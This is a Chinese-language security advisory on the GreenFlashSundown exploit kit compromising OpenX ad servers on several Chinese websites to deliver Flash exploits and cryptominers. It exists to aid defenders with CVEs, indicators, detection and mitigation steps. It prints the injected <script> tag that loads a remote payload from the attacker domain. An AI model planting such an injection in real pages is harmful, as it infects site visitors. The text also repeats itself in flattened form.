攻击预警|GreenFlashSundown Exploit Kit攻击国内多家大型站点
字数 1431 2025-08-18 11:37:16

GreenFlashSundown Exploit Kit攻击分析与防护指南

一、攻击概述

近期发现GreenFlashSundown Exploit Kit利用OpenX广告系统漏洞对国内多家大型网站实施挂马攻击,包括:

  • 知名下载站点52pk.com
  • IT技术网站51CTO.com
  • 医护学习交流平台cmechina.net

攻击特点:

  • 首次被发现用于在国内传播挖矿木马
  • 此前曾用于下发Locky和Hermes勒索病毒
  • 攻击目标为使用OpenX广告管理系统的站点

二、攻击技术分析

1. 攻击流程

  1. 利用OpenX广告系统漏洞修改广告分发代码
  2. 在网页中植入恶意JS脚本
  3. 脚本下载带有CVE-2018-4878漏洞利用代码的Flash对象
  4. 利用Flash漏洞植入挖矿木马

2. 攻击特征

  • 恶意脚本地址:hxxp://advertmention.com/js/ads.min.js
  • 攻击路径:www/delivery/xxx.php?zoneid=id&cb=random_number&n=nNum
  • 攻击方式:在返回广告内容前插入恶意JS脚本

3. OpenX漏洞利用

受影响版本:

  • 51CTO.com使用OpenX 2.8.9
  • cmechina.net使用OpenX 2.8.7

关键漏洞:

  • CVE-2013-3514:XSS漏洞
  • CVE-2013-3515:XSS漏洞
  • CVE-2013-4211:允许植入PHP后门(影响2.8.10及以上版本)

三、GreenFlashSundown Exploit Kit分析

1. 基本信息

  • 最早出现于2016年
  • 是Sundown Exploit Kit的变种
  • 功能全面的漏洞利用套件

2. 历史活动

  • 曾用于传播Locky勒索病毒
  • 曾用于传播Hermes勒索病毒
  • 本次攻击用于传播挖矿木马

3. 新特征

  • 已集成针对OpenX广告管理系统的攻击组件

四、防护建议

1. 长期解决方案

  • 弃用OpenX广告系统:由于OpenX已停止维护多年,建议迁移至其他更安全的广告管理系统

2. 临时防护措施

  1. 配置WAF:为站点配置Web应用防火墙防御攻击
  2. 访问控制:对广告系统以下路径执行访问控制:
    • www/admin
  3. 清除后门:删除触发CVE-2013-4211漏洞的flowplayer/3.1.1/flowplayer-3.1.1.min.js中的后门代码(查找并删除<?php标签之间的恶意代码)

3. 其他建议

  • 及时更新Flash Player或禁用Flash内容
  • 部署终端安全防护软件
  • 对网站进行定期安全审计

五、技术细节补充

1. 恶意代码植入方式

攻击者修改OpenX广告分发模块,在返回的广告内容前插入恶意JS脚本,示例:

// 正常广告内容
<script>...</script>

// 被插入的恶意脚本
<script src="hxxp://advertmention.com/js/ads.min.js"></script>
<script>...</script>

2. OpenX漏洞历史

根据exploit-db数据,OpenX低版本存在大量高危漏洞,包括:

  • SQL注入漏洞
  • XSS漏洞
  • CSRF漏洞
  • 远程代码执行漏洞

3. 攻击检测方法

  • 监控www/delivery路径下PHP文件的异常修改
  • 检查广告返回内容是否包含可疑JS脚本
  • 分析网络流量中是否包含对advertmention.com的请求

六、总结

本次攻击事件表明,使用已停止维护的软件组件会带来严重安全风险。GreenFlashSundown Exploit Kit利用OpenX的已知漏洞实施攻击,网站管理员应尽快采取防护措施,最根本的解决方案是迁移到维护良好的广告管理系统。

GreenFlashSundown Exploit Kit攻击分析与防护指南 一、攻击概述 近期发现GreenFlashSundown Exploit Kit利用OpenX广告系统漏洞对国内多家大型网站实施挂马攻击,包括: 知名下载站点52pk.com IT技术网站51CTO.com 医护学习交流平台cmechina.net 攻击特点: 首次被发现用于在国内传播挖矿木马 此前曾用于下发Locky和Hermes勒索病毒 攻击目标为使用OpenX广告管理系统的站点 二、攻击技术分析 1. 攻击流程 利用OpenX广告系统漏洞修改广告分发代码 在网页中植入恶意JS脚本 脚本下载带有CVE-2018-4878漏洞利用代码的Flash对象 利用Flash漏洞植入挖矿木马 2. 攻击特征 恶意脚本地址:hxxp://advertmention.com/js/ads.min.js 攻击路径:www/delivery/xxx.php?zoneid=id&cb=random_ number&n=nNum 攻击方式:在返回广告内容前插入恶意JS脚本 3. OpenX漏洞利用 受影响版本: 51CTO.com使用OpenX 2.8.9 cmechina.net使用OpenX 2.8.7 关键漏洞: CVE-2013-3514:XSS漏洞 CVE-2013-3515:XSS漏洞 CVE-2013-4211:允许植入PHP后门(影响2.8.10及以上版本) 三、GreenFlashSundown Exploit Kit分析 1. 基本信息 最早出现于2016年 是Sundown Exploit Kit的变种 功能全面的漏洞利用套件 2. 历史活动 曾用于传播Locky勒索病毒 曾用于传播Hermes勒索病毒 本次攻击用于传播挖矿木马 3. 新特征 已集成针对OpenX广告管理系统的攻击组件 四、防护建议 1. 长期解决方案 弃用OpenX广告系统 :由于OpenX已停止维护多年,建议迁移至其他更安全的广告管理系统 2. 临时防护措施 配置WAF :为站点配置Web应用防火墙防御攻击 访问控制 :对广告系统以下路径执行访问控制: www/admin 清除后门 :删除触发CVE-2013-4211漏洞的flowplayer/3.1.1/flowplayer-3.1.1.min.js中的后门代码(查找并删除 <?php标签之间的恶意代码) 3. 其他建议 及时更新Flash Player或禁用Flash内容 部署终端安全防护软件 对网站进行定期安全审计 五、技术细节补充 1. 恶意代码植入方式 攻击者修改OpenX广告分发模块,在返回的广告内容前插入恶意JS脚本,示例: 2. OpenX漏洞历史 根据exploit-db数据,OpenX低版本存在大量高危漏洞,包括: SQL注入漏洞 XSS漏洞 CSRF漏洞 远程代码执行漏洞 3. 攻击检测方法 监控www/delivery路径下PHP文件的异常修改 检查广告返回内容是否包含可疑JS脚本 分析网络流量中是否包含对advertmention.com的请求 六、总结 本次攻击事件表明,使用已停止维护的软件组件会带来严重安全风险。GreenFlashSundown Exploit Kit利用OpenX的已知漏洞实施攻击,网站管理员应尽快采取防护措施,最根本的解决方案是迁移到维护良好的广告管理系统。